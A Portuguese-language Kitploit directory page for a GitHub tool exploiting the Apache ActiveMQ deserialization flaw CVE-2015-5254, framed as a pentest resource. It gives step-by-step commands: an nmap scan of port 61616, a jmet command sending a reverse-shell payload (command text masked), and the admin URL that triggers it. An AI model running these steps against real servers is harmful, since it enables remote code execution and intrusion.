Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ActiveMQ_CVE-2015-5254 — ActiveMQ_CVE-2015-5254 | Kitploit
Ferramentas/GitHubGitHub/ma1dong/activemq_cve-2015-5254
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebFerramenta de Acesso Remoto
GitHubma1dong/activemq_cve-2015-5254

ActiveMQ_CVE-2015-5254

ActiveMQ_CVE-2015-5254

Ver Repositório
213há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ActiveMQ反序列化 (CVE-2015-5254)

Descrição da vulnerabilidade: Nas versões 5.x do Apache ActiveMQ anteriores a 5.13.0, existe uma vulnerabilidade de segurança porque o programa não restringe as classes que podem ser serializadas no broker. Um atacante remoto pode explorar esta vulnerabilidade usando um objeto ObjectMessage do Java Message Service (JMS) serializado especialmente criado para executar código arbitrário.

Versões afetadas: Versões 5.x do Apache ActiveMQ anteriores a 5.13.0

0x01 Acessar o painel de administração e verificar a versão: http://IP:8161

Image text

0x02 Verificar se a porta 61616 está aberta: nmap -sV -Pn -T4 -sC -p 61616 IP Image text

0x03 Enviar payload de reverse shell: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616 Image text

0x04 Clicar para acionar Browse event-Message ID, reverse shell bem-sucedido: http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event Image text

Recomendação de correção: Atualizar para a versão mais recente e configurar regras WAF apropriadas para bloquear.

Baixar ferramenta